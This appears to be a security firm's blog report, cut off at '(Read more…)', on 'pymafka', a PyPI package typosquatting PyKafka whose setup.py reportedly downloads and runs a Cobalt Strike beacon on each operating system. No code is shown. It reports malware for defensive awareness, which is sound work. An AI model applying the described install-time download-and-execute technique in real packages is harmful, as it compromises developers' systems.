New ‘pymafka’ malicious package drops Cobalt Strike on macOS, Windows, Linux
This week, Sonatype’s automated malware detection bots discovered the malicious Python package “pymafka” in the PyPI registry.
The package appears to typosquate a legit popular library PyKafka, a friendly Apache Kafka client for Python. The development follows our discovery of another typosquat targeting the Apache Kafka project earlier this month.
PyKafka includes Python implementations from both Kafka producers and consumers, and has been retrieved over 4,240,305 times through user-initiated downloads and mirrors/bots. In contrast, the malicious “pymafka” shows a download count of around 300, as Sonatype reported the discovery in a timely manner to PyPI.
PyMafka Drops Cobalt Strike on Windows, macOS
On May 17, a mysterious “pymafka” package appeared on the PyPI registry. The package was quickly reported by the Sonatype Nexus platformautomated malware detection capabilities.
The package, ‘pymafka’ may look identical to the popular PyKafka, but its inside reveals a different story.
Python script ‘setup.py’ inside ‘pymafka’ first detects your platform. Depending on whether you are using Windows, macOS or Linux, an appropriate malicious Trojan is downloaded and executed on the infected system.
The Trojan in question is a Cobalt Strike (CS) beacon. Cobalt Strike is a penetration testing software tool typically used by red teams and ethical hackers to simulate real-world cyberattacks, especially during security assessments.
But, time and time again, attackers, including ransomware groups like LockBit, have abused Cobalt Strike to infect their victims.
Interestingly, as the code below shows, on Windows systems the Python script tries to remove the Cobalt Strike tag on ‘C:UsersPubliciexplorer.exe’. Note that this misspelling stands out because the legitimate Microsoft Internet Explorer process is usually called “iexplore.exe” (no ‘r’ at the end) and is not present in the C:UsersPublic directory.
Downloaded malicious executables are ‘win.exe’ [VirusTotal]and ‘MacOS’ [VirusTotal]with (Read more…)